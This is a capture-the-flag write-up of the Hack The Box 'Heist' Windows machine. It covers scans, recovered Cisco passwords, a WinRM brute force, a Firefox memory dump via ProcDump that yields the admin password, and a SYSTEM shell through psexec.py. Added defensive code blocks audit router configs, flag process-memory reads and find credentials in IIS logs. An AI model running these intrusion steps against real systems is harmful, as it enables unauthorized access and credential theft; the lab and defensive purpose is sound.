HTB - Heist

Getting Root:

  1. We gather a few credentials from a Cisco router configuration after logging in as guest to the web application on port 80.

  2. Enumerated the box using enum4linux, smbmap and smbclient and was able to get two additional users.

  3. The box has port 5985 open, so I decided to test every user and password combination to see if any was successful, and was able to get a shell.

  4. On the privilege escalation, I was not able to get much from Watson, Sherlock, winPEAS, PowerUp All-Checks or basic manual enumeration. However, I noticed the box had Firefox listed in the process list, so I decided to do a process dump using Microsoft Sysinternals ProcDump.

  5. After analyzing the dump file, I was able to get the Administrator's password and log in using evil-winrm.

Nmap

nmap -p- 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 22:24 EDT
Nmap scan report for 10.10.10.149
Host is up (0.041s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49668/tcp open  unknown


nmap -sC -sV -p 80,135,445,5985,49668 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 22:27 EDT
Nmap scan report for 10.10.10.149
Host is up (0.040s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 45s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-10T02:28:53
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.32 seconds

Enumerating SMB

I used smbmap, smbclient, enum4linux and crackmapexec and was not able to get anything.

Enumerating http

Gobuster

http://10.10.10.149:80/attachments (Status: 301) [Size: 158]
http://10.10.10.149:80/css (Status: 301) [Size: 150]
http://10.10.10.149:80/errorpage.php (Status: 200) [Size: 1240]
http://10.10.10.149:80/images (Status: 301) [Size: 153]
http://10.10.10.149:80/Images (Status: 301) [Size: 153]
http://10.10.10.149:80/index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/Index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/issues.php (Status: 302) [Size: 16]
http://10.10.10.149:80/js (Status: 301) [Size: 149]
http://10.10.10.149:80/login.php (Status: 200) [Size: 2058]
http://10.10.10.149:80/Login.php (Status: 200) [Size: 2058]

Going to http://10.10.10.149 redirects to http://10.10.10.149/login.php. I tried admin/admin and a few other combinations but nothing worked. However, there is a "Login as guest" button and I was able to log in.

There, the user Hazard has attached the configuration of a Cisco router.

The configuration of the Cisco router has some encrypted passwords and usernames.

Decrypting the Cisco Passwords

User: rout3r Password: $uperP@ssword

User: admin Password: Q4)sJu\Y8qz*A3?d

The enable secret: stealth1agent
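The credentials above came straight out of a router configuration, so the defensive lesson is about how IOS stores them. Added example (not part of this writeup): a small audit script that walks a Cisco IOS config, classifies each credential line by its encoding type and rates it; the sample config and hash values are constructed placeholders, not the Heist router config.

```python
import re

# Constructed sample config (not the Heist router config); hash values are placeholders.
SAMPLE_CONFIG = """\
version 15.2
service password-encryption
enable secret 5 $1$salt$PLACEHOLDERmd5hash
username rout3r password 7 00112233445566778899AABBCC
username admin privilege 15 password 7 00112233445566778899AABBCCDDEEFF
username auditor secret 9 $9$placeholdersalt$PLACEHOLDERscrypthash
username legacy password 0 plaintextpw
"""

# Cisco IOS credential encoding types and how a reviewer should rate them.
# "service password-encryption" only ever produces type 7, which is reversible.
TYPE_INFO = {
    "0": ("CRITICAL", "stored in clear text"),
    "7": ("CRITICAL", "type 7 is reversible obfuscation, treat as clear text"),
    "4": ("HIGH", "unsalted SHA-256, deprecated by Cisco"),
    "5": ("HIGH", "salted MD5, fast to brute force offline"),
    "8": ("OK", "PBKDF2-SHA256"),
    "9": ("OK", "scrypt (use: username <name> algorithm-type scrypt secret <pw>)"),
}
SEVERITY_ORDER = ["OK", "HIGH", "CRITICAL"]

# Matches: enable password|secret [type] value
#          username X [privilege N] password|secret [type] value
CRED_LINE = re.compile(
    r"^\s*(?:username\s+(?P<user>\S+)(?:\s+privilege\s+\d+)?|(?P<enable>enable))"
    r"\s+(?P<kw>password|secret)\s+(?:(?P<type>\d)\s+)?(?P<value>\S+)\s*$"
)


def audit_cisco_config(config_text):
    """Return one finding per credential line, with a severity and a note."""
    findings = []
    for line_no, line in enumerate(config_text.splitlines(), start=1):
        m = CRED_LINE.match(line)
        if not m:
            continue
        enc_type = m.group("type") or "0"  # no type digit means clear text
        severity, note = TYPE_INFO.get(enc_type, ("HIGH", "unknown encoding type"))
        findings.append({"line": line_no, "principal": m.group("user") or "enable",
                         "keyword": m.group("kw"), "type": enc_type,
                         "severity": severity, "note": note})
    return findings


def worst_severity(findings):
    """Highest severity across the findings, 'OK' when nothing was found."""
    return max((f["severity"] for f in findings), key=SEVERITY_ORDER.index, default="OK")
```

Run `audit_cisco_config(open("running-config").read())` on an exported config; anything rated CRITICAL (types 0 and 7) should be treated as already disclosed once the config leaves the device, which is exactly what happened with the attachment on this box.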

Enumerating SMB Again

With the new credentials I enumerated SMB again using smbmap, smbclient, enum4linux and crackmapexec, and was able to get two additional usernames from enum4linux:

S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (Local User)

I first tried the crackmapexec smb and winrm modules to brute force these credentials, but for some weird reason they were not successful and generated a lot of errors, so I used the Metasploit winrm_login module instead.

Enumerating winrm

I tried to brute force the WinRM login with crackmapexec using its winrm module, but it kept failing, so I decided to use the Metasploit winrm_login auxiliary module.

msf5 auxiliary(scanner/winrm/winrm_login) > run

[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:Q4)sJu\Y8qz*A3?d (Incorrect: )  
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:$uperP@ssword (Incorrect: )
[+] 10.10.10.149:5985 - Login Successful: WORKSTATION\chase:Q4)sJu\Y8qz*A3?d
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:$uperP@ssword (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Using evil-winrm

# evil-winrm -i 10.10.10.149 -u chase -p "Q4)sJu\Y8qz*A3?d"

Privilege Escalation

Checking the Processes

We notice that Firefox is running. We could use the ProcDump tool from Microsoft Sysinternals to create a dump of the process.

C:\Users\Chase\documents> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1152      72   144940     183780      39.67    752   1 firefox
    407      31    17372      62200       3.64   2280   1 firefox
    343      19    10032      37420       1.03   2828   1 firefox
    390      33    52028      84108      98.34   5996   1 firefox
    358      26    16360      37764       0.63   6088   1 firefox

Using the Sysinternals Suite from Microsoft

The specific tool we are interested in is ProcDump.

ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use), unhandled exception monitoring and can generate dumps based on the values of system performance counters. It also can serve as a general process dump utility that you can embed in other scripts.

Started with the first process, which is using PID 752:

C:\Users\Chase\documents> .\procdump64.exe -ma 752

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[02:50:41] Dump 1 initiated: C:\Users\Chase\documents\firefox.exe_200310_025041.dmp  
[02:50:41] Dump 1 writing: Estimated dump file size is 484 MB.
[02:50:45] Dump 1 complete: 485 MB written in 3.6 seconds
[02:50:45] Dump count reached.
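From the blue-team side, the dump above is a handle opened on firefox.exe with memory-read rights, which Sysmon records as Event ID 10 (ProcessAccess) with SourceImage, TargetImage and GrantedAccess fields. Added example (not part of this writeup): a triage function over such events that flags non-allow-listed processes reading the memory of credential-bearing targets; the event records and the allow-list are constructed for illustration.

```python
import ntpath

# Process access rights from winnt.h; both are required to read another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Processes whose memory commonly holds credentials (browsers, as on this box, and lsass).
SENSITIVE_TARGETS = {"firefox.exe", "chrome.exe", "msedge.exe", "lsass.exe"}
# Constructed allow-list of sources expected to open these processes on a given host.
KNOWN_GOOD_SOURCES = {"c:\\windows\\system32\\csrss.exe"}

# Constructed Sysmon Event ID 10 records using the real field names; values are made up.
SAMPLE_EVENTS = [
    {"SourceImage": "C:\\Users\\Chase\\documents\\procdump64.exe",
     "TargetImage": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": "C:\\Windows\\System32\\csrss.exe",
     "TargetImage": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": "C:\\Windows\\System32\\Taskmgr.exe",
     "TargetImage": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "GrantedAccess": "0x1000"},  # PROCESS_QUERY_LIMITED_INFORMATION only
]


def suspicious_process_access(event):
    """Return a reason string when the event looks like a memory read of a sensitive
    process by an unexpected source, otherwise None."""
    source = event["SourceImage"].lower()
    target = ntpath.basename(event["TargetImage"]).lower()
    access = int(event["GrantedAccess"], 16)
    if target not in SENSITIVE_TARGETS or source in KNOWN_GOOD_SOURCES:
        return None
    if access & PROCESS_VM_READ and access & PROCESS_QUERY_INFORMATION:
        return f"{source} opened {target} with memory-read access 0x{access:X}"
    return None


def triage_events(events):
    """Collect the reasons for every flagged event, in input order."""
    hits = []
    for event in events:
        reason = suspicious_process_access(event)
        if reason:
            hits.append(reason)
    return hits
```
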

Transferred the file to my Kali box using evil-winrm's download command:

*Evil-WinRM* PS C:\Users\Chase\documents> download firefox.exe_200310_025041.dmp 

Inspecting the file after transfer:

# strings firefox.exe_200310_025041.dmp | grep -i password | more
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=  
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

Got some creds from the dump: User: admin@support.htb Password: 4dD!5}x/re8]FBuZ
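The reason the password was recoverable is that the login form sent it as a GET query parameter, so the full URL sat in Firefox's memory (and, on the server side, in the IIS log and any proxy log). Added example (not part of this writeup): a scanner for IIS W3C logs that reports requests carrying credentials in the query string and redacts them for the report; the log excerpt and its password value are constructed, not taken from the box.

```python
from urllib.parse import parse_qsl

# Constructed IIS W3C log excerpt. Column order is taken from the #Fields: directive.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2020-03-10 02:55:01 10.10.10.149 GET /login.php login_username=admin@support.htb&login_password=s3cretSample&login= 80 - 127.0.0.1 302
2020-03-10 02:55:02 10.10.10.149 GET /issues.php - 80 - 127.0.0.1 200
2020-03-10 02:55:03 10.10.10.149 GET /css/style.css v=3 80 - 127.0.0.1 200
2020-03-10 02:55:04 10.10.10.149 GET /api/reset token=abc123 80 - 127.0.0.1 200
"""

# Parameter-name fragments that should never travel in a query string.
SENSITIVE_KEYS = ("password", "passwd", "pwd", "secret", "token", "apikey", "api_key")


def is_sensitive(name):
    lowered = name.lower()
    return any(key in lowered for key in SENSITIVE_KEYS)


def redact_query(query):
    """Rebuild the query string with sensitive values masked, for safe reporting."""
    return "&".join(f"{n}={'[REDACTED]' if is_sensitive(n) and v else v}"
                    for n, v in parse_qsl(query, keep_blank_values=True))


def find_credential_leaks(log_text):
    """Return one finding per log line whose query string carries a credential."""
    fields, findings = None, []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip() or fields is None:
            continue
        cols = line.split(" ")
        if len(cols) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign columns
        rec = dict(zip(fields, cols))
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        leaked = [n for n, v in parse_qsl(query, keep_blank_values=True)
                  if is_sensitive(n) and v]
        if leaked:
            findings.append({"line": line_no, "stem": rec.get("cs-uri-stem"),
                             "client": rec.get("c-ip"), "params": leaked,
                             "redacted_query": redact_query(query)})
    return findings
```

Any hit here is a finding against the application, not just the log: the fix is to submit the login with POST and keep the session cookie HttpOnly (the nmap output above shows PHPSESSID without that flag).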

Testing those credentials against the Administrator user with evil-winrm confirms that the password is correct.

Got a shell as SYSTEM using psexec.py:

psexec.py Administrator:'4dD!5}x/re8]FBuZ'@10.10.10.149
Impacket v0.9.21.dev1+20200225.153700.afe746d2 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file xvhnmTQR.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service lCrZ on 10.10.10.149.....
[*] Starting service lCrZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>
